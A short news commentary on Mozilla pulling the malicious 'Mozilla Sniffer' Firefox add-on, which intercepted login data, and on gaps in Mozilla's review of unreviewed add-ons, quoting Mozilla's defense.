One of the greatest features of the Mozilla Firefox open source web browser is its incredible extensibility by way of add-ons.
Yet as events this week have shown — yet again – Mozilla’s add-on security model is far from secure.
This week Mozilla pulled the Mozilla Sniffer from its add-ons site – as the tool intercepted login data
submitted to any website, and then sent that data to a remote location.
How does such a malicious piece of software end up in a Mozilla public repository, available for any Firefox user to install?!
In a blog post, Mozilla defends itself noting that the add-on was in an experimental
state, and all users that installed it should have seen a warning
indicating it is unreviewed.
“Unreviewed add-ons are scanned for known
viruses, trojans, and other malware, but some types of malicious
behavior can only be detected in a code review,” Mozilla stated.
Basic malware scans will not pick up the types of attacks that are most common on the web today, namely cross site scripting and information disclosure types of attacks. As such, I for one am worried, as this isn’t the first time bad add-on have made it onto the Mozilla add-on site either. A similar issue was reported in February as well.